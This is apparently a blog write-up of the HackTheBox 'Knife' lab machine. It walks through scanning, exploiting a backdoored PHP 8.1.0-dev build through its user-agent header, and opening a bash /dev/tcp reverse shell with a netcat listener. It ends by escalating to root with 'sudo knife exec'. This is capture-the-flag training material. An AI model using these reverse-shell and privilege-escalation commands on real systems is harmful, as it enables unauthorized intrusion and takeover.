4 min readSep 10, 2021


This machine name ‘Knife’ has dynamic ip address (may different in your tab, when u visit it).

Connect to the VPN machine.

Ping the device to make sure we can reach knife box [].

Used the nmap scan to scan the open ports and services available. It’s not an intense scan or anyway other.

Checked with the port 80 and the health institution came up, but the short texts on the upper right are not working or clickable.

Tried different sets of commands for more information and the box (better enumeration is the key I guess).

Tried nikto scanning tool seems the website does not have any information given on the source expected. PHP/8.1.0-dev seems interesting.

Enumeration and scanning are done. Searching for possible exploit out there on the wild.

Exploit db has this exploit for PHP/8.1.0-dev, using the header user-agent to exploit.

Tried the exploit and it worked.

Use james came up.

Use burpsuite to have a granular overview and understanding how it works.

The ip of knife box has been intercepted and we can all see the header (values and strings). Sent the request to the repeater.

Adding these two lines on the burp request.

Modified the request.


ls -l

Checked my hackthebox tun0 ip address assigned to me. It will help us for reverse shell purposes.

This tool is called hacktools, it’s an extension for chrome / firefox.

Netcat for listening reverse shell at port 4444.

Modified the request to (bash -c ‘exec bash -I &>/dev/tcp/ <&1’)

It went successful and we have now a reverse shell to the knife box.

Now we can see the list of directories on the machine. Unfortunately, we need to escalate our privilege to pivot from one to another. And using the pty.spawn, we

may obtain a shell without having tty, yet wish to interact further with the system. This command will give an interactive shell to the machine ( python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ )

The command went successful.

Technically james can commit as a root without having a password. The command that can be use for this (/usr/bin/knife)

Looking up on google.

We have a hit on knife. Either shell or sudo. We will use the sudo command (sudo knife exec -E ‘exec “/bin/sh” ‘)

Command cat to see the details on the txt file. We got the flag.